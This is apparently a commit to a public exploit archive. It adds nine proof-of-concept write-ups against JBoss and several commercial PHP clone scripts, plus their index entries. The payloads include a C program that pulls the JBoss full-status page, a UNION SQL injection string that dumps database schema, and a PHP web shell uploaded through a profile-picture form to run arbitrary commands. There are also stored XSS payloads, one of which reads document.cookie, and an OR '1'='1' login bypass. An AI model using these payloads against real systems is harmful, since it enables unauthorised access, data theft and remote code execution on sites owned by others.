DB: 2018-02-11

9 changes to exploits/shellcodes JBoss 4.2.x/4.3.x - Information Disclosure Naukri Clone Script 3.0.3 - 'indus' SQL Injection Facebook Clone Script 1.0.5 - Cross-Site Scripting Schools Alert Management Script 2.0.2 - Arbitrary File Upload Lawyer Search Script 1.0.2 - Cross-Site Scripting Bitcoin MLM Software 1.0.2 - Cross-Site Scripting Select Your College Script 2.0.2 - Authentication Bypass Multi religion Responsive Matrimonial 4.7.2 - Cross-Site Scripting Multi Language Olx Clone Script - Cross-Site Scripting
2018-02-11 05:01:52 +00:00 · 2018-02-11 05:01:52 +00:00 · 8d28b02dc1
commit 8d28b02dc1
parent 145dac58fb
10 changed files with 263 additions and 0 deletions
--- a/exploits/multiple/remote/44009.c
+++ b/exploits/multiple/remote/44009.c
@ -0,0 +1,85 @@
+# Exploit Title: JBoss sensitive information disclosure 4.2X & 4.3.X
+# Date: 02/08/2018
+# Exploit Author: JameelNabbo
+# Vendor Homepage: http://www.jboss.org <http://www.jboss.org/>
+# Software Link: http://jbossas.jboss.org/downloads <http://jbossas.jboss.org/downloads>
+# Version: 4.2X. & 4.3.X
+# Tested on: Linux Ubuntu
+# CVE : CVE-2010-1429
+
+
+
+
+1. Description
+   
+By requesting the Status param and sitting its value to true, Jobss will print a sensitive information such as Memory used/Total Memory / Client IP address.
+Example:   http://127.0.01/status?full=true
+ 
+   
+2. Proof of Concept
+
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <netinet/tcp.h>
+#include <sys/socket.h>
+#include <sys/types.h>
+#include <netinet/in.h>
+#include <netdb.h>
+
+
+int socket_connect(char *host, in_port_t port){
+    struct hostent *hp;
+    struct sockaddr_in addr;
+    int on = 1, sock;
+    
+    if((hp = gethostbyname(host)) == NULL){
+        herror("gethostbyname");
+        exit(1);
+    }
+    bcopy(hp->h_addr, &addr.sin_addr, hp->h_length);
+    addr.sin_port = htons(port);
+    addr.sin_family = AF_INET;
+    sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
+    setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (const char *)&on, sizeof(int));
+    
+    if(sock == -1){
+        perror("setsockopt");
+        exit(1);
+    }
+    
+    if(connect(sock, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) == -1){
+        perror("connect");
+        exit(1);
+        
+    }
+    return sock;
+}
+
+#define BUFFER_SIZE 1024
+
+int main(int argc, char *argv[]){
+    int fd;
+    char buffer[BUFFER_SIZE];
+    
+    if(argc < 3){
+        fprintf(stderr, "Usage: %s <hostname> <port>\n", argv[0]);
+        exit(1);
+    }
+    
+    fd = socket_connect(argv[1], atoi(argv[2]));
+    write(fd, "GET /status?full=true\r\n", strlen("GET /status?full=true\r\n")); // write(fd, char[]*, len);
+    while(read(fd, buffer, BUFFER_SIZE - 1) != 0){
+         fprintf(stderr, "%s", buffer);
+    }
+
+    shutdown(fd, SHUT_RDWR);
+    close(fd);
+    return 0;
+}
+
+
+3. Solution :
+Update to version 4.2.3 or later
--- a/exploits/php/webapps/44008.txt
+++ b/exploits/php/webapps/44008.txt
@ -0,0 +1,24 @@
+# Exploit Title: Naukri Clone Script 3.0.3 - 'indus' SQL Injection
+# Dork: N/A
+# Date: 2018-02-08
+# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
+# Vendor Homepage: https://www.phpscriptsmall.com/product/naukri-clone-script/
+# Version: 3.0.3
+# Category: Webapps
+# CVE: N/A
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands.
+# # # # #
+# Proof of Concept :
+
+SQLi:
+
+#
+http://localhost/jobsite-advanced/searchresult.php?searchindus&indus=[SQL]
+
+# Parameter : indus (GET)
+#    Type: UNION QUERY
+#    Title: Generic UNION query (NULL) - 51 columns
+#    payload : UNION SELECT
+NULL,NULL,NULL,/*!00000Concat(0x3C62723E,version(),0x3C62723E,user(),0x3C62723E,database())*/,NULL,NULL,NULL,/*!00000group_coNcat(0x3C62723E,table_name,0x3a,column_name)*/,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/*!00000from*/ information_schema.columns where table_schema=database()%23
--- a/exploits/php/webapps/44010.txt
+++ b/exploits/php/webapps/44010.txt
@ -0,0 +1,19 @@
+######################################################################################
+# Exploit Title: Facebook Clone Script 1.0.5 - Stored XSS
+# Date: 07.02.2018
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/naukri-clone-script/
+# Category: Web Application
+# Exploit Author: Prasenjit Kanti Paul
+# Web: http://hack2rule.wordpress.com/
+# Version: 1.0.5
+# Tested on: Linux Mint
+# CVE: CVE-2018-6858
+#######################################################################################
+
+Proof of Concept
+=================
+1. Login as a user
+2. Goto "Comment" option of any post
+3. Put "<script>alert("PKP")</script>" as comment
+4. You will be having a popup "PKP"
--- a/exploits/php/webapps/44011.txt
+++ b/exploits/php/webapps/44011.txt
@ -0,0 +1,22 @@
+#################################################################################################################
+# Exploit Title: Schools Alert Management Script - 2.0.2 - Arbitrary File Upload / Remote Code Execution
+# Date: 07.02.2018
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/schools-alert-management-system/
+# Category: Web Application
+# Exploit Author: Prasenjit Kanti Paul
+# Web: http://hack2rule.wordpress.com/
+# Version: 2.0.2
+# Tested on: Linux Mint
+# CVE: CVE-2018-6860
+##################################################################################################################
+
+Proof of Concept
+=================
+1. Login as Student/Parent
+2. Go to "Edit Profile" to upload profile picture.
+3. Once you find upload section, upload following code as a PHP file: 
+    <?php
+        if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }
+    ?>
+4. Try to access given PHP file : [site.com]/malicious.php?cmd=ls
--- a/exploits/php/webapps/44012.txt
+++ b/exploits/php/webapps/44012.txt
@ -0,0 +1,19 @@
+#################################################################################################################
+# Exploit Title: Lawyer Search Script - 1.0.2 - Stored XSS
+# Date: 07.02.2018
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/lawyer-script/
+# Category: Web Application
+# Exploit Author: Prasenjit Kanti Paul
+# Web: http://hack2rule.wordpress.com/
+# Version: 1.0.2
+# Tested on: Linux Mint
+# CVE: CVE-2018-6861
+##################################################################################################################
+
+*Proof of Concept*
+
+1. Login into site
+2. Goto "Edit Profile"
+3. Put "<script>alert("PKP")</script>" in any field
+4. You will be having a popup "PKP"
--- a/exploits/php/webapps/44013.txt
+++ b/exploits/php/webapps/44013.txt
@ -0,0 +1,19 @@
+########################################################################
+# Exploit Title: Bitcoin MLM Software 1.0.2 - Stored XSS
+# Date: 07.02.2018
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/bitcoin-mlm/
+# Category: Web Application
+# Exploit Author: Prasenjit Kanti Paul
+# Web: http://hack2rule.wordpress.com/
+# Version: 1.0.2
+# Tested on: Linux Mint
+# CVE: CVE-2018-6862
+##########################################################################
+
+*Proof of Concept*
+
+1. Login into the site
+2. Goto "Edit Profile"
+3. Put "<script>alert("PKP")</script>" in any field
+4. You will be having a popup "PKP"
--- a/exploits/php/webapps/44014.txt
+++ b/exploits/php/webapps/44014.txt
@ -0,0 +1,18 @@
+######################################################################################
+# Exploit Title: Select Your College Script - 2.0.2 - Authentication Bypass
+# Date: 07.02.2018
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link:https://www.phpscriptsmall.com/product/select-your-college-script/
+# Category: Web Application
+# Exploit Author: Prasenjit Kanti Paul
+# Web: http://hack2rule.wordpress.com/
+# Version: 2.0.2
+# Tested on: Linux Mint
+# CVE: CVE-2018-6863
+#######################################################################################
+
+Proof of Concept
+
+1. Goto login page
+2. put [admin' OR '1' = '1] as user and password field
+3. You will be logged in as an authenticated user
--- a/exploits/php/webapps/44015.txt
+++ b/exploits/php/webapps/44015.txt
@ -0,0 +1,20 @@
+#################################################################################################################
+# Exploit Title: Multi religion Responsive Matrimonial - 4.7.2 - Stored XSS
+# Date: 07.02.2018
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link:
+https://www.phpscriptsmall.com/product/multireligion-responsive-matrimonial/
+# Category: Web Application
+# Exploit Author: Prasenjit Kanti Paul
+# Web: http://hack2rule.wordpress.com/
+# Version: 4.7.2
+# Tested on: Linux Mint
+# CVE: CVE-2018-6864
+##################################################################################################################
+
+*Proof of Concept*
+
+1. Login into site
+2. Goto "Edit Profile"
+3. Put "<script>alert("PKP")</script>" in any field
+4. You will be having a popup "PKP"
--- a/exploits/php/webapps/44016.txt
+++ b/exploits/php/webapps/44016.txt
@ -0,0 +1,28 @@
+######################################################################################
+# Exploit Title: Multi Language Olx Clone Script - Stored XSS
+# Date: 08.02.2018
+# Exploit Author: Varun Bagaria
+# Web:
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/olx-clone/
+# Category: Web Application
+# Version:2.0.6
+# Tested on: Windows 7
+# CVE: NA
+#######################################################################################
+
+Proof of Concept
+=================
+URL: https://www.phpscriptsmall.com/product/olx-clone/
+Attack Vector : Comment
+Payload : <svg/onload=alert(document.cookie)>
+
+Reproduction Steps:
+------------------------------
+1.Access the above URL
+2. Click on "User Demo:
+3. Application will be redirected to http://under24usd.com/demo/classi/
+4. Goto "Register" and Create a New User
+5. Now Login into the application and Click on any :Listing"
+6. Click on "Comment" -> "Leave Comment" and inject <svg/onload=alert(document.cookie)>
+7. Persistent XSS will be executed.
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -16008,6 +16008,7 @@ id,file,description,date,author,type,platform,port
 44002,exploits/multiple/remote/44002.py,"Dahua Generation 2/3 - Backdoor Access",2017-05-02,bashis,remote,multiple,
 44004,exploits/hardware/remote/44004.py,"HiSilicon DVR Devices - Remote Code Execution",2017-09-07,"Istvan Toth",remote,hardware,
 44005,exploits/multiple/remote/44005.py,"HPE iLO 4 < 2.53 - Add New Administrator User",2018-02-05,skelsec,remote,multiple,
+44009,exploits/multiple/remote/44009.c,"JBoss 4.2.x/4.3.x - Information Disclosure",2018-02-10,JameelNabbo,remote,multiple,
 41666,exploits/windows/remote/41666.py,"Disk Sorter Enterprise 9.5.12 - 'GET' Remote Buffer Overflow (SEH)",2017-03-22,"Daniel Teixeira",remote,windows,
 41672,exploits/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-02-28,Metasploit,remote,windows,
 41679,exploits/linux/remote/41679.rb,"Ceragon FibeAir IP-10 - SSH Private Key Exposure (Metasploit)",2015-04-01,Metasploit,remote,linux,22
@ -38014,6 +38015,14 @@ id,file,description,date,author,type,platform,port
 43991,exploits/php/webapps/43991.txt,"Hot Scripts Clone Script Classified - Persistent Cross-Site Scripting",2018-02-07,"Prasenjit Kanti Paul",webapps,php,80
 43994,exploits/php/webapps/43994.txt,"Online Test Script 2.0.7 - 'cid' SQL Injection",2018-02-07,L0RD,webapps,php,80
 43995,exploits/php/webapps/43995.txt,"Entrepreneur Dating Script 2.0.2 - Authentication Bypass",2018-02-07,L0RD,webapps,php,80
+44008,exploits/php/webapps/44008.txt,"Naukri Clone Script 3.0.3 - 'indus' SQL Injection",2018-02-10,L0RD,webapps,php,
+44010,exploits/php/webapps/44010.txt,"Facebook Clone Script 1.0.5 - Cross-Site Scripting",2018-02-10,"Prasenjit Kanti Paul",webapps,php,
+44011,exploits/php/webapps/44011.txt,"Schools Alert Management Script 2.0.2 - Arbitrary File Upload",2018-02-10,"Prasenjit Kanti Paul",webapps,php,
+44012,exploits/php/webapps/44012.txt,"Lawyer Search Script 1.0.2 - Cross-Site Scripting",2018-02-10,"Prasenjit Kanti Paul",webapps,php,
+44013,exploits/php/webapps/44013.txt,"Bitcoin MLM Software 1.0.2 - Cross-Site Scripting",2018-02-10,"Prasenjit Kanti Paul",webapps,php,
+44014,exploits/php/webapps/44014.txt,"Select Your College Script 2.0.2 - Authentication Bypass",2018-02-10,"Prasenjit Kanti Paul",webapps,php,
+44015,exploits/php/webapps/44015.txt,"Multi religion Responsive Matrimonial 4.7.2 - Cross-Site Scripting",2018-02-10,"Prasenjit Kanti Paul",webapps,php,
+44016,exploits/php/webapps/44016.txt,"Multi Language Olx Clone Script - Cross-Site Scripting",2018-02-10,"Varun Bagaria",webapps,php,
 41641,exploits/php/webapps/41641.txt,"Joomla! Component JooCart 2.x - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php,
 41642,exploits/php/webapps/41642.txt,"Joomla! Component jCart for OpenCart 2.0 - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php,
 41644,exploits/php/webapps/41644.txt,"phplist 3.2.6 - SQL Injection",2017-03-20,"Curesec Research Team",webapps,php,80